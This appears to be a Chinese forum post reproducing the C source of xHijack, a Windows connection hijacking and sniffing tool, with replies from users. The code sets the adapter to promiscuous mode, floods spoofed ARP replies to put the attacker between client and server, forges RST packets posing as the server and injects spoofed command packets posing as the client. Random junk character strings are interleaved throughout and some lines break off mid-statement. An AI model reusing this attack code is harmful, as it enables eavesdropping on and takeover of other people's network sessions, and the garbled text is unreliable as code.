//这里调用iphlpapi来取得本地ip_addr和mac_addr sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); * C2 S# d, u7 N+ J: g3 K2 c" A4 n dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_BUFFER_OVERFLOW) { printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; } , w5 q6 R* A- I+ H' y pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); 1 a4 t2 T* C, V# B5 {+ n if(!pAdapterInfo) . ~' E& H9 m: M' x { printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); return 0; 2 J, R8 Z. L( h1 _ } # U3 \2 O" [( ~* M! r; i# T$ R dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) { / R6 ?7 J. ?" p# s- ` printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; " F, C1 x2 v+ t" }8 d1 f } pTmp = pAdapterInfo; - g8 s6 I# u! I. E while(pTmp) / k2 ^( n+ _. Q { 8 ~+ F }) Z0 w; ~8 C0 R- K //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) { //found it,get own adapter mac address ; c, j; R' x6 F memcpy(g_szOwnMAC, pTmp->Address, 6); # q7 H8 {/ D% L% F k- k //get ip address pIPAddr = &pTmp->IpAddressList; while(pIPAddr) { - m# a( U. j& m, d$ e g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); ! R8 [' n1 {+ B9 E Z5 m! X" w( @ pIPAddr = pIPAddr->Next; , l; K: ?2 D2 Y8 g if(g_TotalIP >= Max_Num_IPAddr) break; } $ ?$ @5 z' c/ x3 y: R# X2 z7 T8 H4 Z break; 3 c5 Z3 n7 H1 [( f. v6 X } . R5 n# `; F! m0 b) b& P1 W% |: r pTmp = pTmp->Next; ! n' i' I; l$ G, a# Y, i } / |6 W3 ^5 w, N: m free(pAdapterInfo); 7 U+ k$ g) W: Y P: @( u //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; 2 K/ A; x$ t( k' J2 V: K5 ? //---------------------------------------------// % x: l1 m5 X2 ?/ j* z1 q. _ //open adapter lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); ! ~3 D Z5 H9 b: A if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) $ ^, }2 P! N; V { 6 k- h5 g" F. ^$ ?4 @2 e: [. Y Q iRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx\n", iRetCode); * I* r [# l G# @! a+ q9 x return 0; 2 w1 p- n" z( q- E6 `" a2 Y4 [ } & s% C* k( b" K9 ] // set the network adapter in promiscuous mod if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) { printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); ) I; }5 {# l: Q* _8 N! l$ V* |5 F if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) 9 n; g. @# @9 ]7 L* i { + f0 `9 C! f( w. N0 F4 g7 B printf("Unable to set ALL_LOCAL mode!\n"); return 0; $ \9 I0 i4 V \0 e( A8 b } 2 T9 e2 f, f2 X7 m& U# O' r$ L; c- k } ( y5 K( ]- @ j // set a 512K buffer in the driver if(PacketSetBuff(lpAdapter, 512000) == FALSE) ; L* u' d# e7 e- G4 n: C { 5 u: I! B; _/ i% l6 ]4 @3 T( j printf("Unable to set the kernel buffer!\n"); % @3 D* O: M2 d9 V, w+ w return 0; 4 ]1 G3 Q+ U2 |9 S } ! a& j l: }2 p: T // set a 1 second read timeout ' [1 p8 h) D) e, l/ ^* A; `6 T5 C if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) % o, y! z. r& W printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); " S- l; e7 S( A# s/ ? //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); if(g_lpSendPacket == NULL) 7 y5 v7 ~* j% L1 a& l4 ^) v { B' P- B- |6 T printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); $ ?- `' f! @* R3 { B: ^ return 0; ) G$ {) k9 p V } - b( N+ O( A* q ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } //功能：帮助信息 void usage() { ; a1 b5 Z" X- k printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" . d; o0 \* H; ~8 q' v "By eyas 2002/8/19\n" ( r) [# `9 y5 N$ \0 Q) ~- e "http://www.ey4s.org\n" "Thanks to Refd0m and shotgun\n\n" ' s/ G; ]4 X7 W) v1 {2 K$ A "Usage: xHijack ServerSide ClientSide\n\n"); Z7 j5 A8 B0 D) {" v) b! L} 2 [6 N- d4 H, d* [ // //功能：显示数据包的一些详细信息 // VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) 8 W7 P9 a- w& p$ t9 n, _7 c{ 4 H( @/ Q D5 c4 @7 }- B; }+ K* c SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; ! e3 q" F$ `0 w& L# I0 r+ G int i; 0 d a; [9 `1 @& L6 Y- v saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; % ~ e; j, u* {. ~9 D. y7 T5 R saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); ) k% p! v' ^0 Y, `& ]' C printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); //display TCP flag for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) { if((pTCPPacket->tcphdr.th_flag) & FlagMask) printf("%c", g_szTcpFlag); else printf("-"); 3 l5 m: _3 T$ V5 E7 v$ X } / R9 E) ~3 ]' s: H printf("\n"); //如有需要，可显示更多详细的信息 8 J$ S/ l; O, ~; w* w- d& z if(bDetail) ! O/ v7 Q/ l3 b printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); ) u& F" C k4 i( O' x1 A} // 9 k2 u3 A, L0 d# N5 Z8 R//功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 8 n" t7 ~* i4 o! c, L// 7 O* M# N1 I* K* cDWORD WINAPI AnalysePacketsThread(LPVOID lp) ! A& ^* M2 s) f# b{ - d. n3 j& L) Z, u! [) u. H0 d ULONG ulBytesReceived; B. m% F/ x9 Z3 I+ m* R. Q$ X* @6 M USHORT usDataLen; " \ ]+ p, w3 ?% Q1 z7 h9 _ //USHORT usIPHeadLen, usTCPHeadLen; + Z! c8 F: [4 w# | char *buf; 4 ]: r" }4 u3 U5 Y/ z4 s u_int off, i; % S m+ u3 F2 B0 { PTCPPACKET pTCPPacket; struct bpf_hdr *hdr; LPPACKET lpRecvPacket; char szPacketBuf[256000], *pStr; BOOL bDeleteNode, bAddNew; DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 ! ?7 h& l1 y; V: [7 P BOOL bClientToServer;//数据包是否从客户端发送到服务器端 , z" o9 `# {: x6 K //设置接收的packet lpRecvPacket = PacketAllocatePacket(); # F, w3 z, W6 r5 q/ C T! T if(lpRecvPacket == NULL) . ?% F# [ T0 ^9 ~ z. Q7 ~ { printf("Error:failed to allocate the LPPACKET structure for recv.\n"); 9 n3 K- s& F8 v# q return 0; ) E; s5 G# y7 N( y } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); : F" O- r c' o, h; L3 Y, R1 t' ~ PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); while(1) { // capture the packets if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) ) d" `4 T( }2 g' w9 U3 W z5 c5 X$ G { printf("Error: PacketReceivePacket failed.\n"); break; } $ K* D: A- v$ S4 c h) X+ f ulBytesReceived = lpRecvPacket->ulBytesReceived; buf = lpRecvPacket->Buffer; % Q7 s! w/ W s8 O& K9 }- i off = 0; while(off < ulBytesReceived) ) m, I" z& S2 H8 J { hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); off = Packet_WORDALIGN(off + hdr->bh_caplen); //不需要处理自己发出的包(转发或本机发送的) if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; - z+ L" O3 S G) e7 v% F //检查是否TCP包 ; ?0 m. d1 l. C& b$ e9 W if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; : ]2 L" H# F4 m //也不处理DestIP是自己的包 for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
            ResetActionAllFlag();
          }
3 H9 {$ @7 e/ o3 y9 ~. Q          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
          {
. v* |! P# s8 d* \6 T# K3 l6 ^% l* B            //send rst packet to client
            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
            //send hijack packet to client
' h! E0 U2 z! R' c' \2 ?0 Y+ D- T            SendHiJackPacket(pTCPPacket);
            //reset action flag
            ResetActionAllFlag();
: h7 H* v  i+ D9 k          }
! z: i6 D1 C1 |0 X0 R6 _. H7 E, ^' r        }
        //show the tcp data
# s9 Z9 Q8 a( }- U! B# R/ W        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
        {
! A* z6 N# V% x. c          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
1 f5 y) o8 \0 o$ n          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
& z8 k: P8 k- ]: {& ?0 F  |( S7 ]          pStr = (char *)pTCPPacket + 54;
          for(i=0; i        }
      }
$ {$ {# T4 S1 V      //debug output
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
0 o. ~& {' |* _  q    }//end of analyse packets while
4 ^0 v, n$ L. W. f  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
  return 0;
}

3 A2 U& I3 A$ ^9 A0 g
//
//功能：操作记录所有连接信息的单向链表
//
, Z9 P1 W: T2 j/ FDWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
1 d' I5 _3 H, T            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
{
  PCONNINFO  pNew, pTmp;

  pTmp = g_pConnHead;
" h! Q- D& B( x& L  L! N  while(pTmp)
% K& h2 A% @8 R# |! K' Y! g# r( R- @  {
    if(pTmp-&gt;bActive)
    {
* j3 w9 h' C$ K. b! ^  Z! v& P      //found it
      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
& ^3 c5 g# B" y+ L6 _; B        (pTmp-&gt;uClientPort == uClientPort) )
      {
' y% K; L; @4 q% e        if(bDelete)
        {
          pTmp-&gt;bActive = FALSE;
1 t$ C6 z1 Z# I  e/ x2 h) m1 u5 h          return 0;
        }
9 Y: p# c$ u( o0 _8 m6 w7 Y        else return pTmp-&gt;ident;
      }
    }
    pTmp = pTmp-&gt;Next;
  }
9 n$ h4 g/ y5 W! t$ a! o  //not found, create new node
  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
  {
    //search unactive note
& M: Y6 o2 T. I" v( [( o    pTmp = g_pConnHead;
# X$ I* z+ {8 H# U8 r    while(pTmp)
- ?/ S; c# ^* ^2 u' O' D* R    {
* I5 x7 R1 U9 n# ]      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
) Z: }. E, l8 P* q    }
$ b9 c& Q) ?  W4 J! _    //found a unactive node
+ H# t, U* \( I( W    if(pTmp)
    {
& R% G. N0 A/ N9 D6 C  ?# R      pTmp-&gt;dwServerIP = dwServerIP;
$ v) |9 s2 E& W  u& N" w8 t" v8 c      pTmp-&gt;uServerPort = uServerPort;
0 A0 {* J, }$ i2 a8 Y) J      pTmp-&gt;dwClientIP = dwClientIP;
* m, D4 X3 y9 g      pTmp-&gt;uClientPort = uClientPort;
      pTmp-&gt;bActive = TRUE;
      return pTmp-&gt;ident;
) s* M, h, C; J! O0 O# V. C    }
    //not found,create new node
! e" w- _  i  F6 p% O; ^    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
    {
      printf("malloc for link node error:%d\n", GetLastError());
8 L8 A( ]% c* A% z+ ]$ D      return 0;
+ V# M# n: G6 y    }
! R! Y2 i6 v3 F( m0 a* D( g    //fill the struct
/ V2 I- O$ H9 d5 {7 N    pNew-&gt;bActive = TRUE;
& y4 J% I5 j0 K    pNew-&gt;dwServerIP = dwServerIP;
5 L) \1 R. |/ X; |/ }$ Q    pNew-&gt;uServerPort = uServerPort;
    pNew-&gt;dwClientIP = dwClientIP;
    pNew-&gt;uClientPort = uClientPort;
/ h  e! W: T$ V1 ?# |) C    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
    //add new node to link
    if(!g_pConnHead)
- x3 a6 f& k5 N/ ]      g_pConnHead = g_pConnLast = pNew;
    else
" O/ v7 }9 _4 q; Z1 Q, `' x    {
  b3 C* Z! |0 F$ N' Y. o  B. a) o      g_pConnLast-&gt;Next = pNew;
      g_pConnLast = pNew;
    }
    return pNew-&gt;ident;
  }
. L( r8 l! ^2 w/ X" l. y8 @, A  return 0;
}

//
//功能：判断一个数据包是不是只有ACK标志
- a- j' k& h3 m1 B" P//
BOOL IsACKPacket(unsigned char flag)
1 p+ c) h2 W4 P3 l$ K7 O' }{
4 v* n4 Y& M; v4 q0 q8 o, K3 }$ u$ Q( C  int  i, j=1;
  for(i=0 ; i&lt;4; i++)
1 L" r0 A6 b5 Z# k& p5 S7 T, {  {
! g( h3 ]' o4 e9 n' ]    if(flag &amp; j) return FALSE;
    j &lt;&lt;= 1;
" w. P0 e4 W- U  }
' q8 j4 n. `) R# S7 _  if(!(flag &amp; 0x10)) return FALSE;//is ack?
  if(flag &amp; 0x20) return FALSE;
8 U4 V1 o; K3 p1 N3 k! @! g0 n# s  return TRUE;
}

//
//功能：伪装成Client给Server发送数据包
//
BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
' }6 ]8 c  T5 w  [5 \, N+ \4 Q{

; f# U0 R1 I. ?3 x  char    szBuff[1520];
  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
7 u' n6 c6 a+ V* O0 T+ G; y  BOOL    bRet = FALSE;
0 h# f8 q& R4 Q" }
  __try
! r8 G" L/ ?: c  {
    //
    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for hijack packet
    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
( |4 V7 c' X1 e( R$ }% ~8 n9 r* r    if(!pHiJackPacket)
    {
      printf("malloc error:%d\n", GetLastError());
      __leave;
4 Y! e+ N+ D5 j/ k/ m    }
    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
    //-------------- modify the packet ---------------//
    //modify ethernet head
    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
+ m5 }' f, [. l, R! Y8 T    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
' E( t2 F: B6 m$ j7 W9 R: K8 f' c    //modify ip head
. ~* ^# L0 k. n% ?7 U, Z3 O. A9 W    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
" O2 c# h/ i. O    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
: e# z* C6 z6 ~    pHiJackPacket-&gt;iphdr.checksum = 0;
    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
( z( O& r) \, M    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
  A1 _2 l0 {0 i# y4 ]. _    //modify tcp head
( @+ e# b+ a7 X! e* w% `    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
* T& d7 d0 H, N! S! o    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
    pHiJackPacket-&gt;tcphdr.th_sum = 0;
    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
2 m7 g' m! i' K$ D    //fill tcp psd head
- P' D: r7 d9 O8 ^6 b4 b, }( l. B3 V% j. n    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
% g  z! b4 ?/ @  K* f    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
6 _* B& o) g. Q* x    psdhdr.mbz = 0;
+ r$ q7 l! \  z/ t& Z$ a9 ?4 V  ?    psdhdr.ptcl = IPPROTO_TCP;
( b1 Q) L5 A/ \. G- l) Y  y    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
- F4 ~1 l* n( ?  x& J& n- C2 i    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
* g  v3 A; \* W. O$ S    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
    //calculate IP checksum
5 J8 A4 X; r+ s4 _    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer           
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
4 L4 V; B6 Y) @% |1 K( o    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
  G, d6 W0 n# }9 u    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
4 z! I8 J% \, |6 a      printf("Error sending the hijack packets!\n");
; l* I) e9 M/ |9 J5 }2 q2 T      __leave;
2 E# z4 G; p! L3 I* \1 ~& ^( g    }
% b  o& {# o' T2 s8 F* W( T    else printf("Send hijack packet ok!\n");
9 c9 M( ~& y* s; [  Y  @$ D/ Z    bRet = TRUE;
  }

韩冰

__finally
  {
$ u2 D2 \2 r' V" p5 I" r% B    if(pHiJackPacket) free(pHiJackPacket);
  }
  return bRet;
}
6 W. d' V: u- a) q

* r9 L0 E, g% i& ^4 j) G//
! P) i0 u+ s  }- s; V0 o/ |1 ?//功能：伪装成Server给Client发送rst包
7 n8 m7 Z6 m! d6 A4 L& q& N2 |: Q9 l//
* a! E+ r" p0 [BOOL SendRstPacket(unsigned int seq, unsigned int ack)
{
- J/ X; X$ H8 j3 g: f+ O, ^  char    szBuff[60];
  PSDHDR    psdhdr;
  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;

5 G" O' V" q& }* d8 e) @  __try
  {
    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
5 D6 u) w/ F+ ]0 ~    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
: q( E! w; @+ \+ ]    if(!pTcpPacket)
6 p* H" r* L7 |% @, x    {
4 ]6 X1 r8 d% P. X: ?% \! Y7 G5 Y& A8 V% ?      printf("malloc error:%d\n", GetLastError());
      __leave;
    }
    //fill ethernet head
3 @3 a/ }; @7 z. [0 v    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
2 `- q5 F6 T: x0 E! p1 K( Z    //fil ip head
    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket-&gt;iphdr.tos = 0;
+ O& @) m' p- `# B' g    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
" D7 F; Y* o4 F; q% F9 d/ A    pTcpPacket-&gt;iphdr.ident = 1;
' ^0 T6 q9 h5 S. t: C    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
$ T/ u: |. R4 c" l: E    pTcpPacket-&gt;iphdr.checksum = 0;
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
' e2 j' ^; t7 U" I9 q9 y    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
    //fill tcp head
    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
7 X. E# M3 P' V    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
/ p0 T/ d, V* \' `8 O9 Y8 J8 b    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
3 j1 _6 N% D% r( @' j+ [7 O    pTcpPacket-&gt;tcphdr.th_win = 0;
9 Z- G( j+ y0 |* A  l" C8 \    pTcpPacket-&gt;tcphdr.th_urp = 0;
    pTcpPacket-&gt;tcphdr.th_sum = 0;
    //fill tcp psd head
    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
0 E0 o1 C. ?  S6 _8 U9 ^, Z    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
: m/ D; @1 F8 F0 v; o4 v    psdhdr.tcpl = htons(sizeof(TCPHDR));
3 e' R* Q3 D+ U! d! {    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
4 z1 ]) L% B0 m4 B    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
- i. ]" h7 W* A3 P5 q    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
    //calculate IP checksum
    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer
8 j" a. @" l5 v3 `- O7 S    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
      printf("Error sending the rst packets!\n");
      __leave;
* u. I' o2 `: m) B8 S% h& I    }
, s5 J& d6 |5 C  g/ c2 k5 P$ m    else printf("Send RST packet ok!\n");
7 Q. _9 H  \  b8 R+ W  A8 d( K    bRet = TRUE;
  }
& t8 N4 P# {/ [! g% f; }  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
' y0 M! k9 i4 U' R. F5 M  }
  return bRet;
" {! Q3 @4 j& z& `( {. R4 ]" J}

9 k# K% z- [0 s. C1 m# m//
//功能：计算校验和
1 j1 i) ~- ~& X0 S//
. Y9 k6 f5 ?4 Y/ u' L, s, _. C0 DUSHORT checksum(USHORT *buffer, int size)
" m3 a4 F1 `1 m4 t) x1 f* w{
unsigned long cksum=0;
' Y( U0 v. N- y+ o7 y6 l. Q+ p while(size &gt;1) {
# H# p3 G9 m; h# e; H  cksum+=*buffer++;
7 O/ Z6 p8 Z, V" d$ Q4 p& y# g  size -=sizeof(USHORT);
% |' h: C8 J7 x* u  O% C% Y. r }
1 X$ R+ l- G6 C8 s& D# r if(size ) {
  cksum += *(UCHAR*)buffer;
}
: O7 p6 z) _4 l3 G cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
cksum += (cksum &gt;&gt;16);
5 E- ]7 g8 V, A8 M! M# x; W return (USHORT)(~cksum);
}
) N- Z, K0 h# ~5 }5 S) a8 d  n
//
//功能:实施ARP欺骗
$ w1 W0 t% `3 p& E//1 告诉ServerSide,ClientSide的mac是ownmac
//2 告诉ClientSide,ServerSide的mac是ownmac
//
& f1 u5 d% E- B8 EDWORD WINAPI ArpSpoofThread(LPVOID lpType)
{
* p- \# ?' N/ [# k# M/ _% ?  int  iType = *(int *)lpType;
  ARPPACKET  ArpPacket;
  LPPACKET  lpArpPacket;
% c* L( k8 M' P+ e% Y  char    szArpBuff[60];
1 D$ \- N& a- s9 K& K2 V
  switch(iType)
  {
    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
+ Z, a1 z5 j9 j1 P$ w      ArpPacket.arphdr.DestIP = g_ServerSideIP;
      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
# [* m" @! r6 ]4 |8 f4 o    case 2:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ClientSideIP;
4 r+ j, L  ]  G* L$ E, o      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
      break;
    default:
      return 0;
' l2 Y0 f5 i- j, F  H  }
  //ethernet head
2 F! h) ]- `5 o8 H  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
# ]- o" d: K: F+ Q# j/ O6 Y  //arp head
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
2 l# [. V' z8 I; Q. b& W0 l  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
( R& Q6 \8 h+ r! q2 P1 |- E  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
# a1 M* O: l' B7 A% R, M' u6 D  ArpPacket.arphdr.ProType = htons(EPT_IP);
& E0 g# J3 I  G" q) b, ?  ArpPacket.arphdr.op = htons(2);//arp reply
! n# I  [9 ?/ x4 C4 T5 \
( x0 h$ X# a; Y  D6 l  b( T7 n- G1 V  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
  {
" Y7 u) g% {3 M3 _- p# D# I    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
    return 0;
  }
  memset(szArpBuff, 0, sizeof(szArpBuff));
  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
: F) S2 w) Z9 U4 o) o, X4 C. f  PacketInitPacket(lpArpPacket, szArpBuff, 60);
6 X( w+ N6 }1 i$ R) _0 ]+ y* \  v5 k3 {  //send arp packet
  while(1)
! y  F1 T0 J8 c  {
/ S: T' \; u7 ?    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
( F3 H5 k8 K! y$ y) I  K    {
      printf("Error sending the arp spoof packets!\n");
9 _+ U( {, ^4 @& N      return 0;
+ o- n1 q& Z( c+ f, e0 L8 S; V    }
    Sleep(1000);
+ a' ]5 L7 P0 |  }
' v4 S% V  p1 K8 m9 c2 {7 m( J2 `  return 0;
1 _' n; I% e$ z}
7 z: j# D5 b0 H8 u/ m
( K, A: `9 F. F* L//
//功能：输入IP取得对应的MAC地址
/ r/ Z( t; ?4 g; S1 j" I//
5 U! e2 N- R1 f4 hBOOL GetMACAddr(DWORD DestIP, char *pMAC)
{
  DWORD  dwRet;
8 X. ?+ h, M3 ?; B  D+ G# D  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
  if(dwRet == NO_ERROR)
5 o1 r% N, i5 |& I  {
3 \- p5 E% x9 t6 F! k. |    memcpy(pMAC, pulMac, 6);
: {% l) t7 ?3 ^% C* @$ U, H7 u' A    return TRUE;
9 ?8 R& v3 X  X2 U% p$ @  }
  else return FALSE;
}

wy617958197

大侠好厉害啊